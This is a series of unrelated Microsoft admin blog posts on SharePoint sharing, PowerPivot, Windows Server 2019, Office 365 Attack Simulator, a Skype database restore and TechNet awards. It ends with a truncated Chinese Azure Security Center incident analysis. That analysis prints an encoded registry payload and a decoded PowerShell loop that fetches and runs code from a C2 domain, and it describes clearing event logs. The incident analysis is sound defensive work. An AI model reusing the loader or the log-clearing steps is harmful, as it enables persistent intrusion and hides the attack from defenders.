So after I set my Site collection sharing settings to match my SharePoint Admin settings of 'Allow sharing only with the external users that already exist in your organization's directory' the following experience applies.

At this point, even if a site owner tries to share the site with an external user it will not work per the setting because the external user has not been added to Azure AD yet. So the site owner will receive this screen.

I then proceeded to add the external account to Azure AD.

The external user must then accept the email invitation as seen below.

As a global admin, I verified that the external Hotmail account is now in Azure AD as well as the o365 portal.

NOTE: A side note, is if you delete a user from Azure AD it automatically deletes them from the O365 portal

Now when the site owner shares a site with the external user, you will still see the user is not found. Just proceed to send the invite, it will work.

This next screen validates my statement. The site owner will see a notification that displays a message 'Shared with: whomever@hotmail.com'. From a SharePoint perspective, the user has been granted permissions to the site.

This final screen is what the external user sees when now trying to browse to the site. SUCCESS!!!

You may receive the following error when running a scheduled data refresh of a PowerPivot workbook in SharePoint 2016:

The virtual path '/......xlsx' maps to another application, which is not allowed.

After this error occurs, the schedule gets disabled and the schedule settings are deleted. The schedule keeps getting disabled even if the following scheduled refreshes run successfully.

This error is caused by a bug in PowerPivot. The fix will be released in the sppowerpivot16.msi file in the Feature Pack for the upcoming release of SQL Server 2016 SP2.

Hi everyone, a lot of customers have questions about SharePoint Online external sharing of sites. What happens when I check this box? I've enabled external sharing but I still can't share externally. I've gone through the current four scenarios with screenshots in the hopes that it will demystify some of these settings. This is the first of 4 blogs on this subject, each to do with each of the admin settings below.

Here is a mini table of contents

• Scenario 1: Don't Allow Sharing Outside You Organization
• Scenario 2: Allow sharing only with the external users that already exist in your organization's directory
• Scenario 3: Allow users to invite and share with authenticated external users
• Scenario 4: Allow sharing to authenticated external users and using anonymous access links
• External Sharing Matrix

Scenario 1: Don't allow sharing outside your organization

Note: The settings in the screenshot below are accessible via a Global admin OR a SharePoint Admin (meaning someone who has been granted access to the SharePoint Admin center BY a Global Admin). The location is as follows: O365 Portal>>SharePoint admin>>Sharing'

The owner of a site tries to share with a Hotmail account and as expected is prevented from doing hence the red warning text below.

I went a step further and, as the Global Admin, added the Hotmail account to Azure AD just to see what would happen

I then logged into the Hotmail account as the test External user and made sure to accept the email invitation

After the external user accepts the invite they are automatically added to the O365 portal as a Guest account as you can see here from this screenshot

Just as before, when the site owner tries to share with the Hotmail account they are prevented from doing so. So my point was, even if the external user was added to AD the setting of Don't Allow Sharing Outside your Organization still prevented the site from being shared.

This matrix was put together by my fellow PFE colleagues Kevin Kirkpatrick. You can view his blog here. 

This matrix provides the 4 different external sharing options as well as the PowerShell equivalent to set them.

Недавно была анонсирована предварительная версия Windows Server 2019, которая станет доступна во втором полугодии 2018.

Начиная с этого момента, клиенты могут получить доступ к предварительной сборке через программу Insiders.

Windows Server 2019 строится на прочной основе Windows Server 2016.
Мы потратили много времени, изучая обратную связь от  клиентов, чтобы понять будущие тенденции, потребности рынка и как будет трансформироваться бизнес.

Четыре основные направления – гибридная инфраструктура, безопасность, Application Platform и Hyper-converged инфраструктура.

Мы предлагаем многочисленные инновации по этим четырем направлениям в Windows Server 2019.

Мы знаем, что переход в облако – это путешествие, и часто, гибридный подход, который сочетает в себе локальные и облачные среды, работающие вместе, – это то, что является смыслом, базисом улучшения бизнеса для наших клиентов.

Расширение Active Directory, синхронизация файловых серверов и резервное копирование в облако – это лишь несколько примеров того, что клиенты уже делают сегодня, чтобы перевести свои центры обработки данных в общедоступное облако.

Кроме того, гибридный подход также позволяет приложениям, работающим локально, использовать преимущества инноваций в облаке, таких как искусственный интеллект и IoT.

Гибридное облако обеспечивает перспективный, долгосрочный подход. Именно поэтому мы видим, что оно играет центральную роль в облачных стратегиях в обозримом будущем.

Подробнее читайте в блоге

When it comes to security your best line of defense is one that is reactive versus one that is proactive; however, how do you know how you’ll respond to a security incident if one hasn’t yet to occur…that’s where Attack Simulator in Office 365 shines, it’s what sets the security solutions we provide apart from other cloud services.

Attack Simulator is designed to put you ahead of curve and keep you in front of the proverbial 8 ball.  With Attack Simulator you can run realistic attack scenarios in your organization. This can help you identify and find vulnerable users before a real attack impacts your bottom line.

In brief, Attack Simulator as a component of Office 365 Security and Compliance is designed to help you identify issues before they become an issue.  It allows you to determine how end users behave in the event of an attack, and update policies to ensure that appropriate security tools are in place to protect your organization from threats.

Getting Started

Attack Simulator is available as Preview in Office 365 E5 Plans.  The Preview version of Attack Simulator allows you to simulate:

• Display name spear-phishing attacks
• Password-spray attacks
• Brute-force password attacks

To skip ahead and learn how to get started with Attack Simulator visit https://support.office.com/en-us/article/attack-simulator-office-365-da5845db-c578-4a41-b2cb-5a09689a551b.

Display Name Spear-Phishing Attacks

Spear-phishing attacks are designed to play on the trust of a user or users.  The most common spear-phishing attacks involve some level of sophistication, such as understanding influencers within an organization that generate trust amongst potential recipients of email from that individual.

Using Attack Simulator you can simulate this type of attack by creating messages that appear to have originated from such individuals by changing the display name and source address.

The most common objective by bad actors when implementing spear-phishing attacks are to gain access to users' credentials.

In addition to leveraging the email sender (display name) and body, attackers will also use document phishing to lure users into passing their credentials such as sending spam emails to many harvested email addresses. These spam emails may contain content that tries to lure the user into clicking on the provided link or opening the provided attachment. As the victim of a phishing attack, the user may be directed to a legitimate-looking website that masquerades as an online bank or corporate mail service to steal user credentials. These credentials may then be captured on the masquerading web server.

Protect Users from Phishing/Spear Phishing with Office 365 Advanced Threat Protection

Office 365 Advanced Threat Protection allows you to configure anti-phishing policies to protect your users.

The anti-phishing capabilities with ATP applies a set of machine learning models together with impersonation detection algorithms to incoming email messages that provides protection for both spear and commodity phishing attacks. All messages are subject to an extensive set of machine learning models trained to detect phishing messages, together with a set of advanced algorithms used to protect against various user and domain impersonation attacks.

Learn more on using ATP to prevent phishing attacks at https://support.office.com/en-us/article/atp-anti-phishing-capabilities-in-office-365-5076d0f6-7a59-4d6c-bd07-ba95033f0682?ui=en-US&rs=en-US&ad=US.

ATP capabilities such as Spoof Intelligence and Safe Links/Safe Attachments can also be used to further protect users from impersonation, malicious hyperlinks in a message, and malware and viruses.

For a complete list of protected scenarios refer to the ATP service description at https://technet.microsoft.com/en-us/library/exchange-online-advanced-threat-protection-service-description.aspx.

In addition, consider adding DKIM (DomainKeys Identified Mail) signatures to your domains so recipients know that email messages came from users in your organization and weren't modified after they were sent to help protect both senders and recipients from forged and phishing email.

Learn more about DKIM at https://technet.microsoft.com/en-US/library/ms.exch.eac.DKIMDisabled(EXCHG.150).aspx?v=15.20.609.10&l=1&s=BPOS_S_E15_0.

Password-Spray Attacks

Password-spraying is a method of attempting to login with only one password across all domain accounts.  It's an alternative to brute-force password attacks that is designed to mitigate account lockouts where a lockout threshold is in place.

This allows an attacker to attempt many more authentication attempts without locking out users. For example, if I were to attempt to login to every account with the password ‘pass@word1’ it is very likely (hopefully not ;-)) that someone at the target organization used that password and I will now have access to their account.

Simplified, password-spraying is essentially a reverse brute-force attack in that as opposed to attempting many password attempts against a single known user, it involves a single, strategic password, used across many known users.

In the Microsoft cloud we handle billions of sign-ins each day and our security detection algorithms allow us to both detect and subsequently block attacks such as these in real-time.

Some of these capabilities include:

Smart Lockout

Azure Active Directory (Azure AD) protects against password attacks with Smart Lockout.  Smart Lockout differentiates between sign-in attempts that look like they’re from a valid user and sign-ins from what may be an attacker. Smart Lockout ensures potential attackers are locked out without impacting a valid user which helps to prevent denial of service on the user and stops password spray attacks.

IP Lockout

IP lockout works by analyzing sign-ins to assess the quality of traffic from each IP address hitting Microsoft systems, using that data, IP lockout finds IP addresses acting maliciously and blocks those sign-ins in real-time.

Password-Spray Attack Prevention

A password is the key to accessing an account, but in a successful password spray attack, the attacker has guessed the correct password.  The best solution to mitigating password spray attacks is using something more than just a password to distinguish between the account owner and the attacker. For example:

Implement Multi-Factor Authentication

Azure AD Identity Protection uses sign-in data and adds on advanced machine learning and algorithmic detection to risk score every sign-in that comes in to the system. This enables you to create policies in Identity Protection that prompt a user to authenticate with a second factor if and only if there’s risk detected for the user or for the session.

Learn more about Azure AD Identity Protection at https://docs.microsoft.com/en-us/azure/active-directory/active-directory-identityprotection.

For an additional layer of security, you can use Azure MFA to require multi-factor authentication for your users all the time, both in cloud authentication and ADFS.

Learn more about Azure Multi-Factor Authentication at https://docs.microsoft.com/en-us/azure/multi-factor-authentication/multi-factor-authentication, and how to configure Azure MFA for AD FS at https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/operations/configure-ad-fs-and-azure-mfa.

Azure MFA as primary authentication

In AD FS 2016, you have the ability use Azure MFA as the primary authentication means for passwordless authentication which helps to protect against password-spray and theft attacks.  Using Azure MFA as primary authentication bypasses the need for a password which means there is no password for an attacker to guess.  With Azure MFA you can also use a password as the second factor only after your OTP has been validated with Azure MFA. Learn more about using password as the second factor at https://github.com/Microsoft/adfsAuthAdapters.

Brute-Force Password Attack

Perhaps one of the more archaic attacks, brute-force attacks consist of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found.

Brute-Force Password Attack Prevention

Like password-spray attacks you can take advantage of the same recommendations (above) in addition to detection and handling through capabilities such as Cloud App Security.

Cloud App Security is a comprehensive solution that can help you as you move to take advantage of cloud applications, but keep you in control, through improved visibility into activity and increase the protection of critical data across cloud applications.  Cloud App Security provides tools that help uncover shadow IT, assess risk, enforce policies, investigate activities, and stop threats, to help you more safely move to the cloud while maintaining control of critical data.

Through Office 365 Cloud App Security you can, for example, use the Multiple failed user log on attempts to an app policy template to be alerted when a single user attempts to log on to a single app, and fails more than n times within a defined number of minutes.

Learn more about Cloud App Security at https://docs.microsoft.com/en-us/cloud-app-security/what-is-cloud-app-security.

Lastly, enforcing strong passwords and account lockout policies can help to mitigate brute-force attacks.  For more information see also https://docs.microsoft.com/en-us/azure/active-directory/active-directory-passwords-policy.

Conclusion

Your security is only as good as what you put into it.  Using Attack Simulator you can better understand how your users will react and then implement the best set of solutions to ensuring both your organizations', as well as your users' security.  While this article is not intended to provide a comprehensive view of all of the security options available in Office 365, it helps map those capabilities to the simulations available in Attack SimulatorTo learn more about Attack Simulator visit https://support.office.com/en-us/article/attack-simulator-office-365-da5845db-c578-4a41-b2cb-5a09689a551b?ui=en-US&rs=en-US&ad=US.

Office 365 to include SharePoint Online and OneDrive for Business provide a broad set of control to help keep your data safe no matter where users are when they access or share data, what device they’re working on, and how secure their network connection is. Through these controls you can customize the level of access granted to users while making sure the resulting constraints meet your organizational security requirements.

For additional information on protecting yourself against threats in Office 365 refer to https://support.office.com/en-us/article/protect-against-threats-in-office-365-b10023f6-f30f-45d3-b3ad-b71aa4aa0d58.  This article will help you protect your organization against a variety of threats, including spoofing, malware, spam, phishing attempts, and unauthorized access to data.

Next up, Part 2 Using Attack Simulation and Configuring Security Options...

This blog may be helpful for reference when recovering the user data from back-end rtcxds database via SQL restore. I have seen many cases in which user data is either corrupted or  lost  due to various circumstances. I have two SFB 2015 pools in my lab , rtcxds database is part of SQL.green.com. I am trying to restore the database to another SQL server and recovering the user data.

I hope , you are taking the SQL backup of rtcxds database on regular basis. If not , please plan the SQL backup in your environment.

Currently, I am using my SFB FE server SQL express database to restore the rtcxds database. You can also use other SQL server in your setup. Please note , SQL express server 2012/2014 has  10GB size limitation for data restore. If your database size is more then 10GB , you should use SQL enterprise version for restore.

Please copy the SQL backup data and log file to FE server. Create a blank rtcxds database on the SFB FE server. Right click on the blank rtcxds database > select task > restore and click on database. Edit the database path and make sure that correct database restore path is selected.

Rtcxds restore has been completed on FE server and it was mounted.

Open SFB management shell and run following command. This command will export the user data from restored rtcxds database to a zip file.

export-csuserdata -SqlInstanceName  "Fe.domain.comrtclocal"  -DbName rtcxds -Filename c:backup.zip

You can import the data for all users or selected users to the blobstore. Either use Import-CsUserdata or Update-csUserData command based on the requirement. Btw, update command does not require a FE service restart.

Import-CsUserData -PoolFqdn pool.domian.com -FileName c:backup.zip

Update-CsUserData -Filename "C:backupa.zip" -UserFilter "user@domain.com"

If your rtcxds database is down, you can create a new database using below command and import the user data.

install-csdatabase -update -sqlserverfqdn sql.domain.com -configureddatabases

I hope this blog may be helpful for reference. Please comment if you have any questions.

All the votes (for February) are in!

Hope you like the new/evolving layout - to give more width to the judge's comments.

Don't forget, winners of these awards get the chance to win the highly coveted Ultimate TechNet Guru Ninja Pen!

A symbol of winners' erudition and technical rank.

Chiselled from sheer grit and buffed with Microsoft Love ™

As shown below, waved by some of our illustrious leaders.

READ MORE HERE

And so, as we come up to our FIVE YEAR ANNIVERSARY of the competition...

I am proud to present the TechNet Guru Awards, February 2018 !!!!

The TechNet Guru Awards celebrate the technical articles on TechNet, contributed from valued wiki authors like YOU!

Each month, the contributions are scored by a panel of judges (5 per category, 2-3 in each are MS experts), and the winners of each category are showered with love and attention from all corners of TechNet.

See the links at the bottom, to find out more about the competition and how to enter.

We have picked the top three highest scored contributions for each category to bestow our awards upon.

The awards are in gold, silver and bronze, the gold obviously being the top winner of the category.

The last column is just a few of the comments judges made during the judging process.

In some cases, we have not obtained permission to use the judges names, so they have been reduced to initials.

My fellow wiki ninjas will be digging deeper into some of these articles in this blog series, so watch out for those.

Any of our judges can exercise their right to veto an article, if they do not feel it meets minimum requirements for a medal.

When this is the case, we will at least give an indication of the reason, so you understand why.

A big thank you also to the other authors who did not make the top three of each category.

Some articles only just missed out, so we may be returning to discuss those too, in future blogs.

	AnkitSharma007	ASP.NET Core 2.0: CRUD Operation With Entity Framework
Khanna Gaurav: "Nicely explained. Great article" Sabah Shariq: "Nice article with step by step explaining."
	SYED SHANU	Dependency Injection in ASP.NET Core 2.0
Jeff Fritz: "I would have liked to have seen more discussion of AddTransient and what that actually means. AddSingleton and AddScoped should have also been discussed" Khanna Gaurav: "Nice article" Sabah Shariq: "Good article."
	AnkitSharma007	ASP.NET Core 2.0: CRUD Operation With Razor Pages
Jeff Fritz: "No definition of CRUD, would have liked to have seen more Entity Framework usage in configuring the database schema" Khanna Gaurav: "Nicely explained. Great article" Sabah Shariq: "Nice article."

	Johns-305	BizTalk: Sorting and Grouping Flat File Data In SQL…Instead of XSL
JS: "Great new technique to address a long time frustration." Ed Price: "This article meets a big need. Great use and formatting of code and an image. Great to have a Gallery download link! Very well written."
	Mandar Dharmadhikari	BizTalk : Analysis of Direct Mapping vs XDocument Pipeline vs Streaming Pipeline To Process Large Messages for SQL Bulk Insert
JS: "Very in-depth and informative." Ed Price: "Incredibly detailed with a lot of scripts and images! Great See Also and References sections!"
	F.Mondelo	Playing with Persistence Points in Biztalk Orchestrations
JS: "Always great to see ways to learn how BizTalk works internally." Ed Price: "Great use of scripts! I love the diagram in the Conclusion."

Also worth a mention were the other entries this month:

• BizTalk:A Beginner's Guide To Logging In BizTalk Using log4net and BTDF by Mandar Dharmadhikari
  JS: "Nice"
  Ed Price: "Very good explanations and scripts. This is another high-quality article from Mandar!"

	Peter Geelen	MIM 2016 Troubleshooting: no-start-bad-ma-configuration
AM: "Peter, thank you for your contribution. This is a helpful troubleshooting guide for FIM Service MA issues." Lasse Wedø: "Thanks" Ed Price: "Very clear. I love how this article includes the full error, root cause, and then how to go about solving it. Another great article from MVP Peter Geelen!"

	RajeeshMenoth	Channel Configuration - Azure Bot Service To Slack Application
Dileepa Kariyawasam: "Very Well Written with a Good Structure." Tomaž Kaštrun: "Creating BOT service. And connecting it to Slack API with a simple test for a quick demo."
	Chilberto	Azure Cognitive Services - Bing Speech API and Language Understanding Intelligent Service (LUIS)
Afzaal Ahmad Zeeshan: "Good write up with nice blend of visuals." Lasse Wedø: "Thanks" Dileepa Kariyawasam: "Good Article." Tomaž Kaštrun: "Quick introduction to LUIS - speech API and building a sample project."
	Dave Rendón	Migrating WordPress Database from ClearDB to MySQL in Azure
Tomaž Kaštrun: "If you find your self doing migration of a WordPress database from ClearDB to Azure MySQL, you will find some tips in this example." Dileepa Kariyawasam: "Good Article. Needs bit of Improvement with structure etc." Afzaal Ahmad Zeeshan: "Very good"

Also worth a mention were the other entries this month:

• Logic Apps 101: Inserting Data Into Multiple Tables Using SQL Connector and Trigger(SQL) by Mandar Dharmadhikari
  Tomaž Kaštrun: "Creating Azure Logical apps for manipulating data across multiple table using SQL connectors."
  Dileepa Kariyawasam: "Excellent as always! Well Done!"
• Azure Site to Site VPN with Hardware Firewall SonicWall by H Shakir
  Tomaž Kaštrun: "Very informative step by step manual on how to set up the azure site to site VPN."
  Afzaal Ahmad Zeeshan: "Too much usage of images made this is a bit heavy post, Shakir. Please decrease the amount of media."
• Logic Apps: Knowing the State of Your Logic App Process by Johns-305
  Tomaž Kaštrun: "Querying the state of their Logic Apps with Azure functions and Redis Cache."
• SAP Express Edition on Azure: Networking Setup and Troubleshooting by Dave Rendón
  Tomaž Kaštrun: "Step by step of network setup for connecting SAP HANA express with Azure portal"
  Dileepa Kariyawasam: "Good topic. But Article needs improvement. Include TOC, Summery and conclusions / Reference etc. next time."
• Microsoft Operations Management Suite (OMS): A Beginner's Guide by Kamlesh Kumar
  Tomaž Kaštrun: "Quick introduction to OMS - Microsoft Operations Management Suite"
  Dileepa Kariyawasam: "Valuable article. Nicely Writen."
• Microsoft Windows Azure Point to Site VPN by H Shakir
  Dileepa Kariyawasam: "Excellent Article. Well Presented and Structured."
  Tomaž Kaštrun: "Step by step manual on how to set up the azure site to site VPN using also PowerShell."
• Microsoft Azure Site to Site VPN with SonicWall Hardware Firewall by H Shakir
  Dileepa Kariyawasam: "Nice Article. Nice valuable scenario."

	Vincent Maverick Durano	Fun with Xamarin: Building a Simple Working Memory Game App with Web API and SignalR
Ronen Ariely (aka pituach): "Another awesome article from Vincent! Highly recommended. I love step by step tutorials which bring real value to the reader. Well done!" Kia Zhi Tang: "Nice wiki. Enjoyed reading it with good referencing. Thank you for the contribution." Lasse Wedø: "A solid article, which would have been even better had it been written as several smaller articles, as a series."
	Chilberto	Unity3d - Using LUIS for voice activated commnd
Ronen Ariely (aka pituach): "Great article and very interesting. Language Understanding Intelligent Service (LUIS) is very hot topic today. The article is missing "see also" section which can give the reader another value, but except this (which should be fixed) it is well formatted. Well done!" Kia Zhi Tang: "Thank you for sharing the concept."
	AnkitSharma007	Quantum Computing: An Introduction
Lasse Wedø: "A great introduction at a high level, I would have liked to see this post as two posts. One for the great intro, and one for creating the first code." Ronen Ariely (aka pituach): "Great article! Very interesting topic and well written. Perfectly formatted. Well done! It is very hard to rank this category this month as all the articles ate really high quality. Unfortunately, we must vote and only one can be in each position." Kia Zhi Tang: "Thank you for sharing the informative content"

	Ramakrishnan Raman	SharePoint framework aka SPFx with CKeditor5, PnP JS, OfficeUIFabric PeoplePicker and much more
Roman Nedzelsky, MVP: "very nice article, steps explained, good pictures, really good job" John Naguib: "Very nice, thanks for sharing, SPFx is important"
	Siva Padala	Create email validation column in a list without code
John Naguib: "Thanks for sharing" Roman Nedzelsky, MVP: "useful information, nice work" Tiago Costa: "Simple but interesting article."
	Ramakrishnan Raman	Error Logging in Provider hosted add-in using Log4Net
John Naguib: "Well done, logging is important topic" Roman Nedzelsky, MVP: "nice article, really good job"

Also worth a mention were the other entries this month:

• Debugging SharePoint Framework Solutions using Visual Code by Ramakrishnan Raman
  John Naguib: "Well done, this is very nice to have and first time to come through it"
  Tiago Costa: ""
  Roman Nedzelsky, MVP: "almost only pictures with description, some more text would be great here, however very useful"
  Ashutosh Singh: ""

	AV111	MSSQL backup error and solutions
Manoj Pandey: "I would say this is a nice collection of frequently happening issues/errors with most DBAs and would help people like me who work rarely work on admin side." Ronen Ariely (aka pituach): "Very good article. well written and well formatted. Important topic that can be very useful. There is one thing that missing, which is a closer to the article. You cannot leave the reader "in the air". We need a closer like conclusions or summery an so on. Well done!"
	fzb	SQL Server: A severe error occurred on rebuilding an index
Manoj Pandey: "Nice tip !" Ronen Ariely (aka pituach): "Thanks for sharing, but this is not an article but a short post without any structure. An article need to have beginning (like introduction) and ending (like conclusions) and must be formatted according to the interface rules. An article need to have a table of content and a "see also" sections. The content is short and might be a base for a good article with a bit more work."

	AV111	SQL Server 2016: Dynamic Data Masking
Manoj Pandey: "Nice write up with good examples featuring all modes of masking." Richard Mueller: "Very interesting. Should prove useful in many situations. Thanks." Ronen Ariely (aka pituach): "Nice article, but duplicate topic. There is already article on this topic: https://social.technet.microsoft.com/wiki/contents/articles/31419.database-engine-dynamic-data-masking.aspx First step in adding new article should be search for existing articles. The basic idea of Wiki is that anyone can edit and improve existing articles if needed and not create another one."

	Karen Payne	Defensive data programming part 1
SYEDSHANU: "Great Post and good to see the Source code with detailed explanation." Khanna Gaurav: "Very useful extensions" Ed Price: "This is a powerful and lofty topic. It's also great to have a link to the source code on the MSDN Gallery. Thanks, Karen! It could be improved with more of an explanation of the code, as well as See Also (Wiki links) and References (external links) sections at the end."
	.paul.	VB.Net - Tetris.Net
SYEDSHANU: "Nice post ,It will be good to add the detailed description for code part ,Like example break down the code with more explanation of each method with Why and How the code has been used." Khanna Gaurav: "" Ed Price: "Great overview and a fun sample! Also good to have the source code link! It could be improved with more of an explanation of the code."

	Ehsan Sajjad	An Overview  to Understand Equality in .NET
Khanna Gaurav: "Great article" Jaliya Udagedara: "Great article on a very interesting topic. Well explained with examples." Afzaal Ahmad Zeeshan: "Good write up."
	SYED SHANU	Text to Speech using Cognitive Service Speech API C#
Afzaal Ahmad Zeeshan: "Clean write up with good visuals, nice post Shanu!" Jaliya Udagedara: "Nice article to get you started on Bing Speech API with sample code. Cool!" Khanna Gaurav: "Nice article"
	Somdip Dey - MSP Alumnus	C#: Understanding Basics of DateTime and TimeSpan with an Example: Finding Working Day Difference Between Two Dates Based on Weekend And Bank Holidays
Khanna Gaurav: "DateTime & TimeSpan nicely explained" Jaliya Udagedara: "Good article with sample code."

Also worth a mention were the other entries this month:

• C# : Implementing a Linked List by AnkitSharma007
  Jaliya Udagedara: "Good explanation on implementing Linked Lists using C#."
  Khanna Gaurav: "Good one to learn linked list"
• C# - Tetris.Net by .paul.
  Khanna Gaurav: "Great article to learn Windows Form and developing game"
  Afzaal Ahmad Zeeshan: "A great article, as always, but Paul do try to explain as well, code dumps are not useful most of the times; consider MSDN Gallery for code samples."
  Jaliya Udagedara: "Would have been great if the code is described."
• Windows DataGridView with inline edit and remove buttons by Karen Payne
  Jaliya Udagedara: "Nice article with complete source code. Isn't it great."
  Khanna Gaurav: "Should be useful for developer using dataGridView"
• How to create a shared library by Karen Payne
  Jaliya Udagedara: "Good article. Maybe we can change the article title to be more aligned with the content?"

	Rajeesh Menoth	TechNet Wiki - Top Contributors Awards
Richard Mueller: "An excellent way to recognize TechNet Wiki Gurus. Thanks." Ronen Ariely (aka pituach): "Nice statistics. Can be very useful if it will be updated regularly. Thanks for sharing and for the hard work in collecting the statistics. Well done!" Kia Zhi Tang: "Thank you for the work"

	H Shakir	Exchange Server Monitoring Event Logs Status Report in Daily Email Notification
Joseph Moody: "Good tool! Thank you for writing this one as well." Adam Fowler: "Thanks for submitting. There's some spacing issues in the first code example, and I think a daily list of logs would be more valuable than the last 10, but it's a good example of what's possible." Richard Mueller: "Good use of Wiki guidelines. A great idea to keep admins informed of Exchange Server issues. Are the two file names consistent in the article?" Kia Zhi Tang: "Thank you for sharing."

	Subhro Majumder	Active Directory Replication Metadata
Mark Parris: "Good insights into on-premises AD Replication, should be understood by all Active Directory admins." Afzaal Ahmad Zeeshan: "A great write up for anyone to read and understand, explanation was clean." Joseph Moody: "Awesome write up showing some of the things few admins get to see!" Richard Mueller: "Excellent steps to monitor AD replication. Good use of Wiki guidelines. Good explanation of linked and non-replicating attributes." Kia Zhi Tang: "Thank you for sharing. Enjoy reading with good referencing."
	H Shakir	Windows Server 2016: DHCP
Mark Parris: "Graphical instructions on how to install a DHCP server, would be nice to see the command line syntax." Afzaal Ahmad Zeeshan: "" Joseph Moody: "Very good article! I think your headings are a bit off though - other than that, it was great to read." Richard Mueller: "Detailed step by step instructions with images to setup and configure DHCP." Kia Zhi Tang: "Thank you for sharing the DHCP role installation walkthrough."

A huge thank you to EVERYONE who contributed an article to last month's competition.

Best regards,
Pete Laker

More about the TechNet Guru Awards:

• TechNet Guru Competitions

撰 /Greg Cottingham, Cloud Security Investigations & Intelligence - Microsoft Azure Security

為了紀念國家網絡安全意識月（NCSAM），我們在這系列發布了一個新帖子，重點介紹 Azure 安全中心檢測、調查和緩解的實際攻擊。 這篇文章是關於使用 PowerShell 運行惡意代碼，並收集用戶憑證的攻擊。 但在我們開始之前，以下是系列中的其他貼文的回顧，其中安全中心檢測到：

• SQL 暴力攻擊
• 比特幣挖礦攻擊
• 使用網路威脅情報的 DDoS 攻擊
• 良好的應用程式被惡意使用

在這篇文章中，我們將介紹另一個有趣的現實攻擊場景，這個場景被 Azure 安全中心發現並由我們的團隊調查。受影響的公司名稱、所有計算機名稱和所有用戶名都已更改以保護隱私。 這種特殊攻擊採用 PowerShell 來運行內存中的惡意代碼，目的是通過密碼竊取，按鍵記錄，剪貼板抓取和屏幕捕獲來收集憑證信息。我們將列出以 RDP Force 攻擊開始、並導致在註冊表中設置和配置持續的自動啟動（ASEP）。本案例研究提供了有關攻擊動態的深入見解，以及如何檢測和防止您的環境中發生類似攻擊的建議。

初始 Azure 安全中心警報和詳細信息

只要互聯網連接的計算機遠程管理已經存在，黑客就會繼續努力發現遠程桌面協議（RDP）等遠程管理服務，以便他們可以通過強力攻擊破解密碼。 我們的案例從客戶的 Azure 安全中心控制台開始，提醒 RDP 暴力活動以及可疑的 PowerShell 活動。

在下面的Azure安全中心屏幕截圖中，您可以跟踪從下到上的按時間順序進展，因為“失敗的RDP暴力攻擊”警報之後是一個“成功的RDP暴力攻擊”警報 - 表示有人通過RDP 猜到了用戶密碼。 這個惡意的 Brute Force 登錄隨後會出現幾個關於異常 PowerShell 活動的警報。

在我們研究初始成功的 RDP 暴力攻擊警報時，我們會看到攻擊時間、受攻擊的帳戶、嘗試發起攻擊的IP地址（在我們案例中為意大利）以及與 Microsoft Threat Intel 的“ RDP暴力強迫“報告連結。

成功登錄後，當我們深入到高級嚴重性警報頁面時，Azure 安全中心會按時間順序顯示攻擊者成功登錄後發起的每個命令行：

攻擊者活動的最初妥協和細節

通過警報提供的信息，我們的調查團隊與客戶合作，檢查從攻擊者初次登錄，獲取帳戶登錄日誌（事件ID 4624）進程創建日誌（事件ID 4688）。 從最早的登錄數據中，我們看到使用各種用戶名和密碼組合的連續 RDP 強力嘗試。 其中大多數失敗嘗試導致事件 ID 4625（一個帳戶登錄失敗），狀態碼為 0xc000006d（嘗試登錄無效），並且 Substatus 代碼 0xc0000064（指定的帳戶不存在）。

09-06 年的上午 10 點 13 分左右，我們開始看到 Substatus 代碼的變化。 我們現在看到使用者用戶名“ContosoAdmin”呈現不同的狀態代碼：0xc000006a（密碼錯誤）。 隨後使用帳戶“ContosoAdmin”成功登錄類型 3 並輸入 10 （遠程交互）登錄。 登錄似乎源自意大利的 IP 地址（188.125.100.233）。

在登錄後查看進程創建活動。 攻擊者首先發出“whoami”命令，顯示當前登錄用戶的身份。 然後，他們使用網絡組“Domain Admins”/ domain命令列出“Domain Admins”組的成員。 緊接著顯示所有遠程桌面服務會話的“qwinsta”命令。 然後啟動 Taskmgr（Windows任務管理器）以查看或管理進程和服務。

大約一分鐘後，另一個 PowerShell 命令被執行。 這個命令與 Base64 編碼的字符串混淆，這些字符串被額外包裹在 Deflate 壓縮算法中。

注意：我們將深入研究此命令的作用，因為我們稍後會在此文章中解碼 Base64。

大約3分鐘後，攻擊者登出機器。 但在註銷之前，他們會嘗試通過清除所有事件日誌來清理其軌跡。 這是通過內置的 wevtutil.exe（Windows事件命令行實用程序）完成的。 首先，使用“el”或“enum-logs”開關枚舉所有事件日誌。 然後使用“cl”或“clear-log”開關清除所有事件日誌。 以下是攻擊者發起的事件清除命令的一部分。

仔細看看 Base64 編碼的 PowerShell 命令

從攻擊者的初始命令中解碼編碼的 Base64 部分，可以看到更多的 Base64 編碼命令，這些命令顯示：

嵌套的 Base64 混淆。
所有級別的命令執行都會被混淆。
創建一個僅限註冊表的 ASEP（自動啟動擴展點）作為持久性機制。
惡意代碼參數存儲在註冊表中。
由於 ASEP 和參數只在系統註冊表中，所以命令執行發生在“內存中”，沒有文件或 NTFS 工件。

這是攻擊者發出的初始命令：

解碼 Base64 揭示註冊條目和更多的 Base64 字符串解碼...

解碼這些嵌套的Base64值，我們確定該命令執行以下操作：

• 該命令首先儲存參數信息，以供後續命令從 HKLM Software Microsoft Windows CurrentVersion 之下名為“SeCert”的註冊表位置讀取。

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion]
"SeCert"="dwBoAGkAbABlACgAMQApAHsAdAByAHkAewBJAEUAWAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALg

BEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBkAG0AcwBlAHIAdgBlAHIAcwAuAGMAbwBtAC8AJwArACgAWwBjAGgAYQBy

AF0AKAA4ADUALQAoAC0AMwA3ACkAKQApACkAfQBjAGEAdABjAGgAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAfQB9AA=="

• 上述註冊表中的 Base64 值解碼為來自惡意 C2（命令和控制）域（mdmservers [.] com）的下載指令。

while(1){try{IEX(New-Object Net.WebClient).DownloadString('hxxp[:]//mdmservers[.]com/'+([char](85-(-37))))}catch{Start-Sleep -s 10}}

• 然後，攻擊者的指令通過名為“SophosMSHTA”的註冊表 ASEP（自動啟動擴展點）在“HKLM Software Microsoft Windows CurrentVersion Run”項下創建一個永久性的機制。

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
<s


